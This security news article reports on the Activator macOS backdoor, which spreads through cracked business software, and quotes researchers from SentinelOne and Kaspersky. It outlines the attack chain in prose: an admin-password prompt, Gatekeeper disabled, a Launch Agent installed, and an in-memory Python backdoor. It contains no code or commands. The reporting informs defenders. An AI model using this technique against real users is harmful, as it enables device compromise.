Security researchers have sounded the alarm on a new cyberattack campaign using cracked copies of popular software products to distribute a backdoor to macOS users.
What makes the campaign different from numerous others that have employed a similar tactic — such as one reported just earlier this month involving Chinese websites — is its sheer scale and its novel, multistage payload delivery technique. Also noteworthy is the threat actor’s use of cracked macOS apps with titles that are of likely interest to business users, so organizations that don’t restrict what users download can be at risk as well.
Kaspersky was the first to discover and report on the Activator macOS backdoor in January 2024. A subsequent analysis of the malicious activity by SentinelOne has showed the malware to be “running rife through torrents of macOS apps,” according to the security vendor.
“Our data is based on the number and frequency of unique samples that have appeared across VirusTotal,” says Phil Stokes, a threat researcher at SentinelOne. “In January since this malware was first discovered, we’ve seen more unique samples of this than any other macOS malware that we [tracked] over the same period of time.”
The number of samples of the Activator backdoor that SentinelOne has observed is more than even the volume of macOS adware and bundleware loaders (think Adload and Pirrit) that are supported by large affiliate networks, Stokes says. “While we have no data to correlate that with infected devices, the rate of unique uploads to VT and the variety of different applications being used as lures suggests that in-the-wild infections will be significant.”
Building a macOS Botnet?
One potential explanation for the scale of the activity is that the threat actor is attempting to assemble a macOS botnet, but that remains just a hypothesis for the moment, Stokes says.
The threat actor behind the Activator campaign is using as many as 70 unique cracked macOS applications — or “free” apps with copy protections removed — to distribute the malware. Many of the cracked apps have business-focused titles that could be of interest to individuals in workplace settings. A sampling: Snag It, Nisus Writer Express, and Rhino-8, a surface modeling tool for engineering, architecture, automotive design, and other use cases.
“There are many tools useful for work purposes that are used as lures by macOS.Bkdr.Activator,” Stokes says. “Employers that do not restrict what software users can download could be at risk of compromise if a user downloads an app that is infected with the backdoor.”
Threat actors seeking to distribute malware via cracked apps typically embed the malicious code and backdoors within the app itself. In the case of Activator, the attacker has employed a somewhat different strategy to deliver the backdoor.
Different Delivery Method
Unlike many macOS malware threats, Activator doesn’t actually infect the cracked software itself, Stokes says. Instead, users get an unusable version of the cracked app they want to download, and an “Activator” app containing two malicious executables. Users are instructed to copy both apps to the Applications folder, and run the Activator app.
The app then prompts the user for the admin password, which it then uses to disable macOS’ Gatekeeper settings so that applications from outside Apple’s official app store can now run on the device. The malware then initiates a series of malicious actions that ultimately turn off the systems notifications setting and install a Launch Agent on the device, among other things. The Activator backdoor itself is a first-stage installer and downloader for other malware.
The multistage delivery process “provides the user with the cracked software, but backdoors the victim during the installation process,” Stokes says. “This means that even if the user later decided to remove the cracked software, it will not remove the infection.”
Sergey Puzan, malware analyst at Kaspersky, points to another aspect of the Activator campaign that is noteworthy. “This campaign uses a Python backdoor that doesn’t appear on disk at all and is launched directly from the loader script,” Puzan says. “Using Python scripts without any ‘compilers’ such as pyinstaller is a bit more tricky as it require attackers to carry a Python interpreter at some attack stage or ensure that the victim has a compatible Python version installed.”
Puzan also believes that one potential goal of the threat actor behind this campaign is to build a macOS botnet. But since Kaspersky’s report on the Activator campaign, the company has not observed any additional activity, he adds.
